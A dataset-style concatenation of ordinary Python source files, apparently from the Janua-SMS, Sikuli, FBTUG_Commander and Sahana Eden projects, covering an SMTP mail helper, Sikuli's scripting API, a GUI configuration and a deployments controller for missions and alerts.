if self.ssl else
smtplib.SMTP)(self.host, self.port, self.local_hostname, timeout=self.timeout)
# Handshake
if self.tls:
s.starttls()
if self.username and self.password:
s.login(self.username, self.password)
# Finish
self.client = s
class MailObj(object):
"""
Mail object which are passed to mail queue (see :class:`janua.utils.sqlite_queue.PersistentSqliteQueue`).
.. note::
If template attribute is defined, message and subject will be ignored
**Example to send an email:**
.. code-block:: python
from janua import mail_queue
from janua.utils.mail import MailObj, MailError
from janua.utils.logger import getLogger
log = getLogger(__name__)
try:
mailobj = MailObj()
mailobj.message = "Where are you ?"
mailobj.subject = "John"
mailobj.to = "john.doe@nothing.here"
mailobj.reply_to = "admin@nothing.here"
mailobj.bcc = ["admin@nothing.here"]
except MailError, err:
log.error('Cannot instanciate mail object')
mail_queue.put(mailobj)
"""
def __init__(self):
self._message = None
self._subject = None
self._to = []
self._template = None
self._template_args = {}
self._reply_to = None
self._bcc = None
@property
def message(self):
"""Mail body"""
return self._message
@message.setter
def message(self, value):
if not isinstance(value, basestring):
raise MailError('Message argument must be a string')
self._message = value
@property
def subject(self):
"""Mail subject"""
return self._subject
@subject.setter
def subject(self, value):
if not isinstance(value, basestring):
raise MailError('Subject argument must be a string')
self._subject = value
@property
def to(self):
"""Mail recipients"""
return self._to
@to.setter
def to(self, value):
if not isinstance(value, (basestring, list)):
raise MailError('To argument must be a string or a list')
self._to = value
@property
def template(self):
"""Mail template"""
return self._template
@template.setter
def template(self, value):
if not isinstance(value, basestring):
raise MailError('Template argument must be a string')
self._template = value
@property
def template_args(self):
"""Mail template arguements"""
return self._template_args
@template_args.setter
def template_args(self, value):
if not isinstance(value, dict):
raise MailError('Template_args argument must be a dictionary')
self._template_args = value
@property
def reply_to(self):
"""Mail reply to recipient"""
return self._reply_to
@reply_to.setter
def reply_to(self, value):
if not isinstance(value, basestring):
raise MailError('Reply_to argument must be a string')
self._reply_to = value
@property
def bcc(self):
"""Mail blind carbon copy"""
return self._bcc
@bcc.setter
def bcc(self, value):
if not isinstance(value, list):
raise MailError('Bcc argument must be a list')
self._bcc = value
class JanuaMailer():
def __init__(self, config, januapath):
self.config = config
self.postman = None
self.januapath = januapath
if self.config.enable:
connection = ESMTPConnection(
config.smtp_host,
config.smtp_port,
config.smtp_username,
config.smtp_password,
local_hostname=None,
ssl=config.smtp_ssl,
tls=config.smtp_tls,
timeout=config.smtp_timeout
)
self.postman = Postman(config.mail_from, connection)
def get_template(self, name):
path = os.path.join(
self.januapath,
'mail_template',
self.config.mail_language.upper(),
name
)
if not os.path.exists(path):
raise MailError('Template %s not found' % name)
template = Template.from_directory(
path,
subject_name='subject.txt',
text_name='body.txt',
html_name='body.html'
)
template.set_renderer(UnicodePythonTemplateRenderer)
return template
def sendmail(self, mailobj):
if not isinstance(mailobj, MailObj):
raise MailError('argument must be MailObj')
if not self.config.enable:
raise MailError('Mail option has been disabled, dropping mail ...')
subject = mailobj.subject
message = mailobj.message
if isinstance(mailobj.to, list):
to = mailobj.to
else:
to = [mailobj.to]
template = mailobj.template
template_args = mailobj.template_args
reply_to = mailobj.reply_to
bcc = mailobj.bcc
if self.postman:
if template:
tmpl = self.get_template(template)
msg = tmpl(to, template_args, reply_to=reply_to, bcc=bcc)
else:
msg = Message(to, subject, text=message, reply_to=reply_to, bcc=bcc)
if msg:
try:
with self.postman.connect() as c:
c.sendmail(msg)
except Exception, err:
raise MailError(err)
return True
return False
def valid_email(address):
"""
Check validity of email address
:param address: mail address to validate
:returns: True if valid, False otherwise
"""
pattern = r"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)"
return re.match(pattern, address)
| mesocentrefc/Janua-SMS | janua/utils/mail.py | Python | gpl-2.0 | 8,164 |
# Copyright 2010-2013, Sikuli.org
# Released under the MIT License.
# modified RaiMan 2013
from __future__ import with_statement
from org.sikuli.basics import Debug
Debug.log(3, "Jython: sikuli: Sikuli: entering")
import time
import __builtin__
import __main__
import types
import sys
import os
import inspect
Debug.log(3, "Jython: sikuli: Sikuli: constants")
import org.sikuli.script.FindFailed as FindFailed
from org.sikuli.script.FindFailedResponse import *
from org.sikuli.script.Constants import *
import org.sikuli.script.Button as Button
from org.sikuli.script.Button import WHEEL_UP, WHEEL_DOWN
from org.sikuli.basics import OS
Debug.log(3, "Jython: sikuli: Sikuli: import Region")
from org.sikuli.script import Region as JRegion
from Region import *
from org.sikuli.script import Observing
Debug.log(3, "Jython: sikuli: Sikuli: import Screen")
from org.sikuli.script import Screen as JScreen
from Screen import *
Debug.log(3, "Jython: sikuli: Sikuli: Env.addHotkey")
from Env import *
Debug.log(3, "Jython: sikuli: Sikuli: import Match")
from org.sikuli.script import Match
Debug.log(3, "Jython: sikuli: Sikuli: import Pattern")
from org.sikuli.script import Pattern
Debug.log(3, "Jython: sikuli: Sikuli: import Location")
from org.sikuli.script import Location
Debug.log(3, "Jython: sikuli: Sikuli: import ScreenUnion")
from org.sikuli.script import ScreenUnion
Debug.log(3, "Jython: sikuli: Sikuli: import Finder")
from org.sikuli.script import Finder
from org.sikuli.script import ImageFinder
from org.sikuli.script import ImageFind
Debug.log(3, "Jython: sikuli: Sikuli: import Image")
from org.sikuli.script import Image
from org.sikuli.script import ImageGroup
Debug.log(3, "Jython: sikuli: Sikuli: import ImagePath")
from org.sikuli.script import ImagePath
Debug.log(3, "Jython: sikuli: Sikuli: import App")
from org.sikuli.script import App
Debug.log(3, "Jython: sikuli: Sikuli: import KeyBoard/Mouse")
from org.sikuli.script import Key
from org.sikuli.script import KeyModifier
from org.sikuli.script.KeyModifier import KEY_CTRL, KEY_SHIFT, KEY_META, KEY_CMD, KEY_WIN, KEY_ALT
from org.sikuli.script import Mouse
Debug.log(3, "Jython: sikuli: Sikuli: import from Basics")
from org.sikuli.basics import Settings
from org.sikuli.basics import ExtensionManager
Debug.log(3, "Jython: sikuli: Sikuli: import from compare")
from org.sikuli.script.compare import DistanceComparator
from org.sikuli.script.compare import VerticalComparator
from org.sikuli.script.compare import HorizontalComparator
Debug.log(3, "Jython: sikuli: Sikuli: init SikuliImporter")
import SikuliImporter
Debug.log(3, "Jython: sikuli: Sikuli: import SikuliX")
from org.sikuli.basics import SikuliScript
from org.sikuli.basics import SikuliX
##
# some support for handling unicode and strings
#
## use instead of print if unicode strings present
# usage: uprint(s1, u1, u2, u3, s3, ...)
#
def uprint(*args):
for e in args[:-1]:
if isinstance(e, str): print e,
else: print e.encode("utf8"),
if isinstance(args[-1], str): print args[-1]
else: print args[-1].encode("utf8")
##
# to make an utf8-encoded string from a str object
#
def unicd(s):
return ucode(s)
def ucode(s):
return (unicode(s, "utf8"))
##
# loads a Sikuli extension (.jar) from
# 1. user's sikuli data path
# 2. bundle path
#
def load(jar):
def _load(abspath):
if os.path.exists(abspath):
if not abspath in sys.path:
sys.path.append(abspath)
return True
return False
if _load(jar):
return True
path = getBundlePath()
if path:
jarInBundle = os.path.join(path, jar)
if _load(jarInBundle):
return True
path = ExtensionManager.getInstance().getLoadPath(jar)
if path and _load(path):
return True
return False
##
# append the given path sys.path if not yet contained
#
def addImportPath(path):
addModPath(path)
##
# append the given path image path list if not yet contained
#
def addImagePath(path):
ImagePath.add(path)
##
# return the current image path list
#
def getImagePath():
return [e.pathGiven for e in ImagePath.getPaths() if e]
##
# remove the given path from the image path
#
def removeImagePath(path):
ImagePath.remove(path)
##
# reset the image path, so it only contains the bundlepath
#
def resetImagePath(path = None):
if not path:
path = getBundlePath();
ImagePath.reset(path)
##
# Sets the path for searching images in all Sikuli Script methods. <br/>
# Sikuli IDE sets this to the path of the bundle of source code (.sikuli)
# automatically. If you write Sikuli scripts by the Sikuli IDE, you should
# not call this method.
#
def setBundlePath(path):
ImagePath.setBundlePath(path)
##
# return the current bundlepath (usually the folder .sikuli) or None if no bundlepath is defined
#
def getBundlePath():
return ImagePath.getBundlePath()
##
# return the parent folder of the current bundlepath
# (usually the folder containing the current script folder.sikuli)
# or None if no bundlepath is defined
#
def getParentPath():
return ImagePath.getBundleParentPath();
##
# make a valid path by joining the two paths (path2 might be a list)
#
def makePath(path1, path2):
if (not isinstance(path2, List)):
path = os.path.join(path1, path2)
else:
path = path1
for p in path2:
path = os.path.join(path, p)
return path
##
# Sikuli shows actions (click, dragDrop, ... etc.) if this flag is set to <i>True</i>.
# The default setting is <i>False</i>.
#
def setShowActions(flag):
Settings.setShowActions(flag)
##
# Shows a message dialog containing the given message.
# @param msg The given message string.
def popup(msg, title="Sikuli"):
SikuliX.popup(msg, title)
##
# Shows a question-message dialog requesting input from the user.
# @param msg The message to display.
# @param default The preset text of the input field (default empty).
# @param title the title for the dialog (default: Sikuli input request)
# @param hidden =true makes the dialog run as a password input (input hidden with bullets)
# @return The user's input string.
#
def input(msg="", default="", title="", hidden=False):
if (hidden):
default = ""
return SikuliX.input(msg, default, title, hidden)
##
# Shows a dialog request to enter text in a multiline text field
# Though not all text might be visible, everything entered is delivered with the returned text
# The main purpose for this feature is to allow pasting text from somewhere
# @param msg the message to display.
# @param title the title for the dialog (default: Sikuli input request)
# @param lines the maximum number of lines visible in the text field (default 9)
# @param width the maximum number of characters visible in one line (default 20)
# @return The user's input including the line breaks.
def inputText(msg="", title="", lines=0, width=0):
return SikuliX.input(msg, title, width, lines)
def capture(*args):
scr = ScreenUnion()
if len(args) == 0:
simg = scr.userCapture()
if simg:
return simg.getFilename()
else:
return None
elif len(args) == 1:
if __builtin__.type(args[0]) is types.StringType or __builtin__.type(args[0]) is types.UnicodeType:
simg = scr.userCapture(args[0])
if simg:
return simg.getFilename()
else:
return None
else:
return scr.capture(args[0]).getFilename()
elif len(args) == 4:
return scr.capture(args[0], args[1], args[2], args[3]).getFilename()
else:
return None
def selectRegion(msg=None):
if msg:
r = ScreenUnion().selectRegion(msg)
else:
r = ScreenUnion().selectRegion()
if r:
return Region(r)
else:
return None
##
# set the default screen to given or primary screen
#
# TODO where else to remember an opened remote screen?
remoteScreen = None
def use(scr = None, remote = False):
if remote:
theGlobals = inspect.currentframe().f_back.f_back.f_globals
else:
theGlobals = inspect.currentframe().f_back.f_globals
global remoteScreen
if remoteScreen:
remoteScreen.close()
remoteScreen = None
if not scr:
SCREEN = Screen()
else:
SCREEN = scr
Debug.log(3, "Jython: requested to use as default region: " + SCREEN.toStringShort())
globals()['SIKULISAVED'] = _exposeAllMethods(SCREEN, globals().get('SIKULISAVED'), theGlobals, None)
theGlobals['SCREEN'] = SCREEN
if remote:
remoteScreen = SCREEN
return SCREEN
##
# set the default screen to given remote screen
#
def useRemote(adr, port = 0):
global remoteScreen
import org.sikuli.script.ScreenRemote as SR
SCREEN = SR(adr, str(port))
if SCREEN.isValid():
return use(SCREEN, True)
else:
return None
##
# Switches the frontmost application to the given application.
# If the given application is not running, it will be launched by openApp()
# automatically. <br/>
# Note: On Windows, Sikule searches in the text on the title bar
# instead of the application name.
# @param app The name of the application. (case-insensitive)
#
def switchApp(app):
return App.focus(app)
##
# Opens the given application. <br/>
# @param app The name of an application if it is in the environment variable PATH, or the full path to an application.
#
def openApp(app):
return App.open(app)
##
# Closes the given application. <br/>
# @param app The name of the application. (case-insensitive)
#
def closeApp(app):
return App.close(app)
##
# Sleeps until the given amount of time in seconds has elapsed.
# @param sec The amount of sleeping time in seconds.
def sleep(sec):
time.sleep(sec)
##
# shutdown and return given exit code
#
def exit(code=0):
global remoteScreen
if remoteScreen:
remoteScreen.close()
remoteScreen = None
SikuliX.cleanUp(code)
sys.exit(code)
##
# Runs the given string command.
# @param msg The given string command.
# @return Returns the output from the executed command.
def run(cmd):
return SikuliX.run(cmd)
##
# display some help in interactive mode
def shelp():
SikuliScript.shelp()
##
# helper functions, that can be used when sorting lists of regions
#
def byDistanceTo(x, y=None):
""" Method to compare two Region objects by distance of their top left.
or a regions top left to the given point by coordinates"""
return DistanceComparator(x, y)
def byX(m):
""" Method to compare two Region objects by x value. """
return HorizontalComparator().compare
def byY(m):
""" Method to compare two Region objects by y value. """
return VerticalComparator().compare
def verticalComparator():
""" Method to compare two Region objects by y value. """
return VerticalComparator().compare
def horizontalComparator():
""" Method to compare two Region objects by x value. """
return HorizontalComparator().compare
def distanceComparator(x, y=None):
""" Method to compare two Region objects by distance of their top left.
or a regions top left to the given point by coordinates"""
if y is None:
return DistanceComparator(x).compare # x is Region or Location
return DistanceComparator(x, y).compare # x/y as coordinates
##
################## internal use only ###########################################
#
def addModPath(path):
if path[-1] == Settings.getFilePathSeperator():
path = path[:-1]
if not path in sys.path:
sys.path.append(path)
def _exposeAllMethods(anyObject, saved, theGlobals, exclude_list):
if not exclude_list:
exclude_list = [ 'class', 'classDictInit', 'clone', 'equals', 'finalize',
'getClass', 'hashCode', 'notify', 'notifyAll',
'toGlobalCoord', 'toString', 'getLocationFromPSRML', 'getRegionFromPSRM',
'capture', 'selectRegion', 'create', 'observeInBackground', 'waitAll',
'updateSelf', 'findNow', 'findAllNow', 'getEventManager',
'lastMatch', 'lastMatches', 'lastScreenImage', 'lastScreenImageFile']
#Debug.log(3, "Sikuli: _exposeAllMethods: %s called from: %s", anyObject, theGlobals['__name__'])
tosave = []
if not saved:
saved = []
for name in dir(anyObject):
if name in exclude_list: continue
try:
if not inspect.ismethod(getattr(anyObject,name)): continue
except:
continue
if name[0] != '_' and name[:7] != 'super__':
try:
saved.remove(name)
except:
pass
tosave.append(name)
#print "added:", name
theGlobals[name] = eval("anyObject."+name)
if name == 'checkWith': Debug.log(3, "%s %s", name, str(dict[name])[1:])
for name in saved:
if name in theGlobals:
#print "removed:", name
theGlobals.pop(name)
return tosave
############### set SCREEN as primary screen at startup ################
use()
| azoft-dev-team/imagrium | libs/sikuli/Sikuli.py | Python | mit | 13,054 |
#==========================
# Config Parameters
#==========================
interval_x= 6
interval_y= 6
entry_width= 30
btn_width= 5
btn_hegiht= 1
grp_offsetX= -2
grp_offsetY= -16
interval_rdbox= 60
#===================================================
# Save Path
#===================================================
savePath= 'Data/'
saveParaPath= 'Para/'
saveScanningPath= savePath+ 'Scanning/'
saveImageProccesPath= savePath+ 'ImageProcess/'
configName= 'config.json'
scanIndex= 'Raw'
#==========================
# Config Text
#==========================
rdbox_PlantIndexItem= ["LAB", "NDI", "ExG"]
rdbox_BinaryMethodItem= ["Simple", "Otsu", "Adaptive"]
#===================================================
# Defalut Value
#===================================================
defaultDict={\
'thrshd_gray': 128,\
'thrshd_Minsize': 1000,\
'thrshd_Maxsize': 9999,\
'Scan_X (Beg,Interval,Amount)': [0,500,4],\
'Scan_Y (Beg,Interval,Amount)':[0,500,4],\
'limit Maximum (X,Y)':[100000, 100000],\
'Max Speed (X, Y)':[400,400,400],\
'Ac/Deceleration (X, Y)':[100,100,100],\
'Camera ID':0,\
'Peripheral Setting': [('Fan',8),('Water Pump',9),('Vaccum Pump',10)],\
'Move Amount type (5 types)':[('100', 100),('500', 500),('1k',1000),('10k',10000), ('100k',100000)],\
'script Path':"Script/test.txt"\
}
| FBTUG/DevZone | FBTUG_Commander/gui_vars.py | Python | mit | 1,401 |
# -*- coding: utf-8 -*-
"""
Deployments
"""
module = request.controller
resourcename = request.function
if not settings.has_module(module):
raise HTTP(404, body="Module disabled: %s" % module)
s3db.hrm_vars()
# -----------------------------------------------------------------------------
def index():
""" Customisable module homepage """
return settings.customise_home(module, alt_function="index_alt")
# -----------------------------------------------------------------------------
def index_alt():
"""
Fallback for module homepage when not customised and
no CMS content found (ADMINs will see CMS edit unless
disabled globally via settings.cms.hide_index)
"""
# Just redirect to the Mission Summary View
s3_redirect_default(URL(f="mission", args="summary"))
# -----------------------------------------------------------------------------
def mission():
""" RESTful CRUD Controller """
def prep(r):
# Configure created_on field in deploy_mission
created_on = r.table.created_on
created_on.readable = True
created_on.label = T("Date Created")
created_on.represent = lambda d: \
s3base.S3DateTime.date_represent(d, utc=True)
if r.id:
# Mission-specific workflows return to the profile page
tablename = r.tablename if not r.component else r.component.tablename
next_url = r.url(component="", method="profile", vars={})
if r.component_name == "alert":
alert_create_script()
s3db.configure(tablename,
create_next = URL(f="alert",
args=["[id]", "select"]),
delete_next = next_url,
update_next = next_url,
)
else:
s3db.configure(tablename,
create_next = next_url,
delete_next = next_url,
update_next = next_url,
)
s3.cancel = next_url
if r.component_name == "assignment":
member_id = r.get_vars.get("member_id", None)
if member_id and str(member_id).isdigit():
# Deploy-this-member action
htable = s3db.hrm_human_resource
query = (htable.id == member_id) & \
(htable.deleted != True)
row = db(query).select(htable.id, limitby=(0, 1)).first()
if row:
field = s3db.deploy_assignment.human_resource_id
field.default = row.id
field.writable = False
field.comment = None
elif r.method == "create":
atable = s3db.deploy_assignment
atable.end_date.writable = atable.end_date.readable = False
if not r.component and r.method == "profile":
represent = lambda d: \
s3base.S3DateTime.datetime_represent(d, utc=True)
s3db.deploy_alert.modified_on.represent = represent
s3db.deploy_response.created_on.represent = represent
s3base.s3_trunk8(lines=1)
else:
# All other workflows return to the summary page
s3.cancel = r.url(method="summary", component=None, id=0)
if not r.component and \
r.get_vars.get("~.status__belongs") == "2":
s3.crud_strings[r.tablename]["title_list"] = T("Active Missions")
return True
s3.prep = prep
def postp(r, output):
if not r.component:
# Override mission open actions to go to the profile page
s3_action_buttons(r,
deletable=True,
editable=True,
read_url=r.url(method="profile", id="[id]"),
update_url=r.url(method="profile", id="[id]"),
delete_url=r.url(method="delete", id="[id]"),
)
# Override the missions list-button go to the summary page
if isinstance(output, dict) and "buttons" in output:
# Override standard "List" button
buttons = output["buttons"]
if "list_btn" in buttons and "summary_btn" in buttons:
buttons["list_btn"] = buttons["summary_btn"]
elif "subtitle" in output and "rheader" in output:
# In component CRUD views, have a subtitle after the rheader
output["rheader"] = TAG[""](output["rheader"],
H3(output["subtitle"]))
return output
s3.postp = postp
return s3_rest_controller(# Remove the title if we have a component
# (rheader includes the title)
notitle=lambda r: {"title": ""} \
if r.component else None,
rheader=s3db.deploy_rheader,
)
# -----------------------------------------------------------------------------
def response_message():
"""
RESTful CRUD Controller
- can't be called 'response' as this clobbbers web2py global!
"""
return s3_rest_controller("deploy", "response",
custom_crud_buttons = {"list_btn": None},
)
# -----------------------------------------------------------------------------
def human_resource():
"""
RESTful CRUD Controller
"""
# Tweak settings for RDRT
settings.hrm.staff_experience = True
settings.hrm.use_skills = True
settings.search.filter_manager = True
# Add deploy_alert_recipient as component so that we filter by it
s3db.add_components("hrm_human_resource",
deploy_alert_recipient = "human_resource_id",
)
# Filter to just Deployables
q = FS("application.active") != None
output = s3db.hrm_human_resource_controller(extra_filter=q)
return output
# -----------------------------------------------------------------------------
def person():
"""
'Members' RESTful CRUD Controller
- currently used as "member profile"
- used for Imports
"""
# Tweak settings for RDRT
settings.hrm.staff_experience = "experience"
settings.hrm.vol_experience = "experience"
settings.hrm.use_skills = True
settings.search.filter_manager = True
return s3db.hrm_person_controller(replace_option = None,
csv_extra_fields = [
# CSV column headers, so no T()
dict(label="Deployable",
value="true"),
# Assume volunteer if not
# specified in CSV
dict(label="Type",
value="volunteer"),
],
csv_stylesheet = ("hrm", "person.xsl"),
csv_template = ("deploy", "person"),
)
# -----------------------------------------------------------------------------
def application():
"""
Custom workflow to manually create standing applications
for deployments (for staff/volunteers)
"""
# Tweak settings for RDRT
settings.hrm.staff_experience = True
settings.hrm.use_skills = True
settings.search.filter_manager = True
def prep(r):
if not r.method and r.representation != "s3json":
r.method = "select"
if r.method == "select":
r.custom_action = s3db.deploy_apply
return True
s3.prep = prep
if "delete" in request.args or \
request.env.request_method == "POST" and auth.permission.format=="s3json":
return s3_rest_controller()
else:
#return s3db.hrm_human_resource_controller()
return s3_rest_controller("hrm", "human_resource")
# -----------------------------------------------------------------------------
def assignment():
""" RESTful CRUD Controller """
def prep(r):
mission_date = s3db.deploy_mission.created_on
mission_date.represent = lambda d: \
s3base.S3DateTime.date_represent(d, utc=True)
if r.record:
table = r.resource.table
table.mission_id.writable = False
table.human_resource_id.writable = False
if r.representation == "popup":
r.resource.configure(insertable=False)
return True
s3.prep = prep
def postp(r, output):
if r.id and isinstance(output, dict):
# Add button to Upload Appraisal
popup = r.representation == "popup"
record_id = r.id
atable = s3db.hrm_appraisal
ltable = s3db.deploy_assignment_appraisal
query = (ltable.assignment_id == record_id) & \
(atable.id == ltable.appraisal_id) & \
(atable.deleted != True)
appraisal = db(query).select(atable.id,
limitby=(0, 1)).first()
permit = auth.s3_has_permission
url = None
if appraisal and permit("update", atable, record_id=appraisal.id):
hrtable = db.hrm_human_resource
hr = db(hrtable.id == r.record.human_resource_id).select(hrtable.person_id,
limitby=(0, 1)
).first()
if hr:
get_vars = {}
if popup:
method = "update.popup"
refresh = get_vars.get("refresh", None)
if refresh:
get_vars["refresh"] = refresh
record = get_vars.get("record", None)
if record:
get_vars["record"] = record
else:
method = "update"
url = URL(c="deploy", f="person",
args=[hr.person_id, "appraisal",
appraisal.id, method],
vars=get_vars,
)
elif permit("update", r.table, record_id=record_id):
# Currently we assume that anyone who can edit the assignment can upload the appraisal
hrtable = db.hrm_human_resource
hr = db(hrtable.id == r.record.human_resource_id).select(hrtable.person_id,
limitby=(0, 1)
).first()
if hr:
get_vars = {"mission_id": r.record.mission_id,
}
if popup:
method = "create.popup"
refresh = get_vars.get("refresh", None)
if refresh:
get_vars["refresh"] = refresh
record = get_vars.get("record", None)
if record:
get_vars["record"] = record
else:
method = "create"
url = URL(c="deploy", f="person",
args=[hr.person_id, "appraisal", method],
vars=get_vars,
)
if url:
button = s3base.S3CRUD.crud_button(T("Upload Appraisal"),
_href=url,
_class="action-btn",
)
if popup:
output["items"] = button
else:
s3.rfooter = button
return output
s3.postp = postp
return s3_rest_controller()
# -----------------------------------------------------------------------------
def competency():
""" RESTful CRUD controller - unfiltered version """
return s3db.hrm_competency_controller()
# -----------------------------------------------------------------------------
def credential():
""" RESTful CRUD controller - unfiltered version """
return s3db.hrm_credential_controller()
# -----------------------------------------------------------------------------
def experience():
""" Experience Controller - unfiltered version """
return s3db.hrm_experience_controller()
# -----------------------------------------------------------------------------
def job_title():
""" RESTful CRUD Controller """
return s3_rest_controller("hrm", "job_title")
# -----------------------------------------------------------------------------
def training():
""" Training Controller - unfiltered version """
return s3db.hrm_training_controller()
# -----------------------------------------------------------------------------
def hr_search():
"""
Human Resource REST controller
- limited to just search_ac for use in Autocompletes
- allows differential access permissions
"""
# Filter to just deployables (RDRT Members)
s3.filter = FS("application.active") == True
s3.prep = lambda r: r.method == "search_ac"
return s3_rest_controller("hrm", "human_resource")
# -----------------------------------------------------------------------------
def person_search():
"""
Person REST controller
- limited to just search_ac for use in Autocompletes
- allows differential access permissions
"""
# Filter to just deployables (RDRT Members)
s3.filter = FS("application.active") == True
s3.prep = lambda r: r.method == "search_ac"
return s3_rest_controller("pr", "person")
# -----------------------------------------------------------------------------
def alert_create_script():
"""
Inject JS to help the Alert creation form
"""
# @ToDo: Generalise for alternate gateways
# @ToDo: Port to _compose_form
table = s3db.msg_sms_webapi_channel
gateway = db(table.enabled == True).select(table.max_length,
limitby=(0, 1)
).first()
if gateway:
max_length = gateway.max_length
if max_length is None:
# Single SMS
max_length = 160
else:
# Single SMS
max_length = 160
script = \
'''$('#deploy_alert_contact_method').change(function(){
var v=$(this).val()
if(v==1){$('#deploy_alert_subject__row,#deploy_alert_subject__row1').show()
$('#deploy_alert_subject__row1 label').html(i18n.subject+':')
S3.maxLength.init('deploy_alert_body',0)
}else if(v==2){$('#deploy_alert_subject__row,#deploy_alert_subject__row1').hide()
S3.maxLength.init('deploy_alert_body',%(max_length)s)
}else if(v==9){$('#deploy_alert_subject__row,#deploy_alert_subject__row1').show()
$('#deploy_alert_subject__row1 label').html(i18n.subject+': <span class="red">'+i18n.only_visible+'</span>')
S3.maxLength.init('deploy_alert_body',%(max_length)s)
}})''' % dict(max_length = max_length)
s3.jquery_ready.append(script)
i18n = \
'''i18n.characters_left="%s"
i18n.subject="%s"
i18n.only_visible="%s"''' % (T("characters left"),
T("Subject"),
T("Only visible to Email recipients"))
s3.js_global.append(i18n)
def alert():
""" RESTful CRUD Controller """
# Tweak settings for RDRT
settings.hrm.staff_experience = True
settings.hrm.use_skills = True
settings.search.filter_manager = True
def prep(r):
if r.component:
if r.component.alias == "select":
if not r.method:
r.method = "select"
if r.method == "select":
r.custom_action = s3db.deploy_alert_select_recipients
elif r.component_name == "response":
s3db.configure(r.component.tablename,
deletable = False,
editable = False,
insertable = False,
)
elif r.component_name == "recipient":
settings.search.filter_manager = False
from s3.s3filter import S3TextFilter, S3OptionsFilter
recipient_filters = [
s3base.S3TextFilter([
"human_resource_id$person_id$first_name",
"human_resource_id$person_id$middle_name",
"human_resource_id$person_id$last_name",
],
label=current.T("Name"),
),
s3base.S3OptionsFilter(
"human_resource_id$organisation_id",
widget="multiselect",
filter=True,
header="",
hidden=True,
),
]
if settings.get_org_regions():
recipient_filters.insert(1,
s3base.S3HierarchyFilter(
"human_resource_id$organisation_id$region_id",
lookup="org_region",
hidden=True,
)
)
s3db.configure(r.component.tablename,
filter_widgets=recipient_filters)
if r.record.message_id:
s3db.configure(r.component.tablename,
insertable=False,
deletable=False)
else:
if r.record:
if r.record.message_id:
# Already sent - so lock
s3db.configure(r.tablename,
deletable = False,
editable = False,
)
else:
alert_create_script()
s3db.configure(r.tablename,
create_next = URL(f="alert",
args=["[id]", "select"]),
deletable = False,
# @ToDo: restrict in postp to change this action button
#editable = False,
)
created_on = r.table.modified_on
created_on.readable = True
created_on.label = T("Date")
created_on.represent = lambda d: \
s3base.S3DateTime.date_represent(d, utc=True)
return True
s3.prep = prep
def postp(r, output):
if r.component:
if r.component_name == "select":
s3.actions = [{"label": str(READ),
"url": URL(f="human_resource",
args=["[id]", "profile"],
),
"_class": "action-btn read",
}
]
if r.component_name == "recipient":
# Open should open the HR profile, not the link
open_url = URL(f="human_resource",
args=["profile"],
vars={"alert_recipient.id": "[id]"},
)
# Delete should delete the link, not the HR profile
delete_url = URL(f="alert",
args=[r.id, "recipient", "[id]", "delete"],
)
s3_action_buttons(r,
read_url = open_url,
update_url = open_url,
delete_url = delete_url,
# Can't delete recipients after the alert
# has been sent:
deletable = not r.record.message_id
)
else:
# Delete should only be possible if the Alert hasn't yet been sent
table = r.table
query = auth.s3_accessible_query("delete", "deploy_alert") & \
(table.message_id == None)
rows = db(query).select(table.id)
restrict = [str(row.id) for row in rows]
s3.actions = [{"label": str(READ),
"url": URL(f="alert", args="[id]"),
"_class": "action-btn read",
},
{"label": str(DELETE),
"url": URL(f="alert", args=["[id]", "delete"]),
"restrict": restrict,
"_class": "delete-btn",
},
]
return output
s3.postp = postp
return s3_rest_controller(rheader = s3db.deploy_rheader,
# Show filter only on recipient tab
hide_filter = {"recipient": False,
"_default": True,
}
)
# -----------------------------------------------------------------------------
def email_inbox():
"""
RESTful CRUD controller for the Email Inbox
- all Inbound Email Messages are visible here
@ToDo: Filter to those which have been unable to be automatically
processed as being responses to Alerts
@ToDo: Filter to those coming into the specific account used for
Deployments
@ToDo: Provide a mechanism (Action button?) to link a mail manually to
an Alert
"""
if not auth.s3_logged_in():
session.error = T("Requires Login!")
redirect(URL(c="default", f="user", args="login"))
tablename = "msg_email"
table = s3db.msg_email
table.inbound.readable = False
table.channel_id.readable = False
table.to_address.readable = False
from s3.s3query import FS
s3.filter = (FS("response.id") == None) & \
(FS("inbound") == True)
from s3.s3forms import S3SQLCustomForm, S3SQLInlineComponent
crud_form = S3SQLCustomForm("date",
"subject",
"from_address",
"body",
S3SQLInlineComponent(
"attachment",
name = "document_id",
label = T("Attachments"),
fields = ["document_id",
],
),
)
s3db.configure(tablename,
crud_form = crud_form,
editable = False,
insertable = False,
list_fields = ["id",
"date",
"from_address",
"subject",
"body",
(T("Attachments"), "attachment.document_id"),
],
)
# CRUD Strings
s3.crud_strings[tablename] = Storage(
title_list = T("View InBox"),
title_update = T("Edit Message"),
label_list_button = T("View InBox"),
label_delete_button = T("Delete Message"),
msg_record_modified = T("Message updated"),
msg_record_deleted = T("Message deleted"),
msg_list_empty = T("No Messages currently in InBox")
)
def prep(r):
# Decode subject and sender fields
decode = current.msg.decode_email
if r.id:
s3db.msg_attachment.document_id.label = ""
if r.component and r.component.alias == "select":
if not r.method:
r.method = "select"
if r.method == "select":
r.custom_action = s3db.deploy_response_select_mission
represent = lambda string: decode(string)
elif not r.method and r.representation in ("html", "aadata"):
# Use custom data table method
r.method = "inbox"
r.custom_action = s3db.deploy_Inbox()
represent = lambda string: s3base.s3_datatable_truncate(decode(string))
table = r.resource.table
table.subject.represent = represent
table.from_address.represent = represent
return True
s3.prep = prep
def postp(r, output):
if r.interactive and r.record and not r.component:
# Custom CRUD button for linking the message to mission
authorised = auth.s3_has_permission("create", "deploy_response")
if authorised:
s3.rfooter = s3base.S3CRUD.crud_button(
T("Link to Mission"),
_href=URL(f="email_inbox",
args=[r.id, "select"],
),
_class="action-btn link",
)
return output
s3.postp = postp
return s3_rest_controller("msg", "email")
# -----------------------------------------------------------------------------
def email_channel():
"""
RESTful CRUD controller for Inbound Email channels
@ToDo: Allow selection of a specific Channel for Alerts
"""
def prep(r):
table = r.table
tablename = "msg_email_channel"
s3db.configure(tablename,
deletable = False,
)
if not r.id:
# Have we got a channel defined?
record = db(table.deleted == False).select(table.id,
limitby=(0, 1)
).first()
if record:
r.id = record.id
r.method = "update"
else:
r.method = "create"
if r.interactive:
table.server.label = T("Server")
table.protocol.label = T("Protocol")
table.use_ssl.label = "SSL"
table.port.label = T("Port")
table.username.label = T("Username")
table.password.label = T("Password")
table.delete_from_server.label = T("Delete from Server?")
table.port.comment = DIV(_class="tooltip",
_title="%s|%s" % (T("Port"),
T("For POP-3 this is usually 110 (995 for SSL), for IMAP this is usually 143 (993 for IMAP).")))
